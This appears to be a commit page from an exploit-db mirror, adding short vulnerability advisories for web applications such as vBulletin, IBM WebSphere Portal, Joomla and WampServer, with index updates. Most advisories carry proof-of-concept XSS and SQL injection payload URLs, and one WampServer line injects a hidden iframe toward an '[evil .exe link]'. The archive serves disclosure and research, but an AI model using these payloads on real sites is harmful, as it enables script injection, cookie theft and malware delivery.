bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_09_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-09 04:36:29 +00:00
parent 7212b7381b
commit 32619a65bd
12 changed files with 125 additions and 16 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -13061,7 +13061,7 @@ id,file,description,date,author,platform,type,port
15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD <= 3.0.30 Deluxe Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 - x86_64 ia32syscall Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27+ x86_64 compat exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0
15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27+ - x86_64 compat Local Root Exploit",2010-09-16,Ac1dB1tCh3z,linux,local,0
15026,platforms/windows/local/15026.py,"BACnet OPC Client Buffer Overflow Exploit",2010-09-16,"Jeremy Brown",windows,local,0
15027,platforms/windows/dos/15027.py,"Firefox Plugin Parameter EnsureCachedAttrParamArrays - Remote Code Execution",2010-09-17,Abysssec,windows,dos,0
15029,platforms/php/webapps/15029.txt,"phpmyfamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0
@ -15414,7 +15414,7 @@ id,file,description,date,author,platform,type,port
17783,platforms/windows/local/17783.pl,"ZipX for Windows 1.71 ZIP File - Buffer Overflow Exploit",2011-09-05,"C4SS!0 G0M3S",windows,local,0
17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String DoS Exploit (TOWeb.MO file corruption)",2011-09-05,"BSOD Digital",windows,dos,0
17786,platforms/php/webapps/17786.txt,"Webmobo WB News System Blind SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0
17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0
17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro SEH Overwrite",2011-09-06,blake,windows,local,0
17789,platforms/php/webapps/17789.txt,"WordPress Tweet Old Post plugin <= 3.2.5 - SQL Injection Vulnerability",2011-09-06,sherl0ck_,php,webapps,0
17790,platforms/php/webapps/17790.txt,"WordPress post highlights plugin <= 2.2 - SQL Injection Vulnerability",2011-09-06,"Miroslav Stampar",php,webapps,0
@ -30325,3 +30325,13 @@ id,file,description,date,author,platform,type,port
33653,platforms/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 'reloadFrame' Parameter Cross Site Scripting Vulnerability",2010-02-18,"George Christopoulos",multiple,remote,0
33654,platforms/php/webapps/33654.py,"Madness Pro <= 1.14 - Persistent XSS",2014-06-06,bwall,php,webapps,0
33655,platforms/php/webapps/33655.py,"Madness Pro <= 1.14 - SQL Injection",2014-06-06,bwall,php,webapps,0
33656,platforms/php/webapps/33656.txt,"XlentProjects SphereCMS 1.1 'archive.php' SQL Injection Vulnerability",2010-02-18,"AmnPardaz Security Research Team",php,webapps,0
33657,platforms/php/webapps/33657.txt,"Subex Nikira Fraud Management System GUI 'message' Parameter Cross-Site Scripting Vulnerability",2010-02-18,thebluegenius,php,webapps,0
33658,platforms/php/webapps/33658.txt,"Social Web CMS 2 'index.php' Cross Site Scripting Vulnerability",2010-02-19,GoLdeN-z3r0,php,webapps,0
33659,platforms/php/webapps/33659.txt,"Joomla! 'com_recipe' Component Multiple SQL Injection Vulnerabilities",2010-02-20,FL0RiX,php,webapps,0
33660,platforms/php/webapps/33660.txt,"vBulletin 4.0.2 Multiple Cross Site Scripting Vulnerabilities",2010-02-20,indoushka,php,webapps,0
33661,platforms/php/webapps/33661.txt,"Galerie Dezign-Box Multiple Input Validation Vulnerabilities",2010-02-22,indoushka,php,webapps,0
33662,platforms/windows/remote/33662.txt,"WampServer 2.0i lang Parameter Cross Site Scripting Vulnerability",2010-02-22,"Gjoko Krstic",windows,remote,0
33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection Vulnerability",2010-02-19,"Sjoerd Resink",multiple,remote,0
33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0
33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0

Can't render this file because it is too large.

14
platforms/linux/local/15704.c
View file

@ -1,17 +1,3 @@
/*
Hi all,
I've included here a proof-of-concept local privilege escalation exploit
for Linux. Please read the header for an explanation of what's going
on. Without further ado, I present full-nelson.c:
Happy hacking,
Dan
--snip--
*/
/*
* Linux Kernel <= 2.6.37 local privilege escalation
* by Dan Rosenberg

11
platforms/multiple/remote/33663.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/38360/info
IBM WebSphere Portal is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
An authenticated attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
IBM WebSphere Portal 6.0.1.5 Build Level wp6015_008_01 is vulnerable; other versions may also be affected.
The following code can trigger this issue:
" style="position:absolute; top:-100px; left:-100px; width:10000 px; height:10000px; z-index:999;" onmousemove="alert('XSS')"&gt;

7
platforms/multiple/remote/33664.html Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38369/info
Mozilla Firefox is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.
<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>

11
platforms/php/webapps/33656.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/38309/info
SphereCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SphereCMS 1.1 Alpha is vulnerable; other versions may also be affected.
The following example URI is available:
http://www.example.com/archive.php?view=***

8
platforms/php/webapps/33657.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/38311/info
The Subex Nikira Fraud Management System GUI is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/login/prompt?message=%3Cscript%3Ealert%28%27Reflected%20XSS%27%29%3C/script%3E

11
platforms/php/webapps/33658.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/38329/info
Social Web CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Social Web CMS Beta 2 is vulnerable; other versions may also be affected.
The following example URI is available:
http://www.example.com/index.php?category=%22%3E[XSS]

10
platforms/php/webapps/33659.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/38336/info
The 'com_recipe' component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_recipe&view=recipe&layout=defaults&rec=73[EXPLOIT1]
http://www.example.com/index.php?option=com_recipe&task=type&Itemid=16&type=4&category=2[EXPLOIT2]
http://www.example.com/index.php?option=com_recipe&task=view&Itemid=16&id=4[EXPLOIT3]

29
platforms/php/webapps/33660.txt Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/38339/info
vBulletin is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
These issues affect vBulletin 4.0.2; other versions may also be affected.
http://www.example.com/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>

9
platforms/php/webapps/33661.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38347/info
Galerie Dezign-Box is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include a cross-site scripting vulnerability and multiple file-upload vulnerabilities.
Attackers may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
An attacker can exploit the file-upload issues to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
http://www.example.com/nom.php?id=tufgxab0x2r4xybg527w&nom=<img+src=http://server/dt.gif+onload=alert(213771818860)>

7
platforms/php/webapps/33665.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38383/info
Softbiz Jobs is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
htpp://www.example.com/scripts/seojobs/admin/addad.php?sbad_type="><script>alert(123)</script>

10
platforms/windows/remote/33662.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/38357/info
WampServer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
WampServer 2.0i is vulnerable; other versions may also be affected.
http://www.example.com/index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E
http://www.example.com/index.php?lang=%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22http://[evil .exe link]%22%3E%3C/iframe%3E